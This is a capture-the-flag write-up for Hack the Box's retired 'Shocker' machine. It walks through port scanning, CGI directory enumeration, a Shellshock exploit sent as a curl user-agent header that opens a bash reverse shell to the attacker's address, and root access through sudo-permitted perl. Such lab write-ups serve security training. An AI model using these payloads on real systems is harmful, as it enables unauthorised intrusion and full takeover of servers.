Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retried Shocker lab.
Level: Beginners
Task: find user.txt and root.txt file in the victim’s machine.
Let’s start with a basic nmap scan
c:\Users\jacco>nmap -sC -sV 10.10.10.56 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time Nmap scan report for 10.10.10.56 Host is up (0.031s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds
Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin, index.html, server-status
root@kali:~/htb/shocker# dirb http://10.10.10.56 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 28 12:56:05 2019 URL_BASE: http://10.10.10.56/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.56/ ---- + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) + http://10.10.10.56/index.html (CODE:200|SIZE:137) + http://10.10.10.56/server-status (CODE:403|SIZE:299) ----------------- END_TIME: Tue May 28 12:58:24 2019 DOWNLOADED: 4612 - FOUND: 3
root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 28 13:02:27 2019 URL_BASE: http://10.10.10.56/cgi-bin/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.56/cgi-bin/ ---- + http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118) ----------------- END_TIME: Tue May 28 13:04:47 2019 DOWNLOADED: 4612 - FOUND: 1
root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh Content-Type: text/plain Just an uptime test script 15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00
Let’s run the Shellshock command against this file and see if we can pull a reverse shell. I looked across the internet to find the string that causes the Shellshock bug and whipped something together.
The command I used looked like this:
root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
root@kali:~/htb/shocker# nc -lvp 443 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.56. Ncat: Connection from 10.10.10.56:39634. bash: no job control in this shell shelly@Shocker:/usr/lib/cgi-bin$ id id uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh [!] Started reverse shell handler [-] Trying exploit on : /cgi-bin/user.sh [!] Successfully exploited [!] Incoming connection from 10.10.10.56 10.10.10.56> id uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) 10.10.10.56> ls user.sh 10.10.10.56> cd /home 10.10.10.56> ls shelly 10.10.10.56> cd shelly 10.10.10.56> cat user.txt 2ec*****233 10.10.10.56> sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl 10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"' 10.10.10.56> id uid=0(root) gid=0(root) groups=0(root) 10.10.10.56> cat /root/root.txt 52c*****a467
Author: Jacco Straathof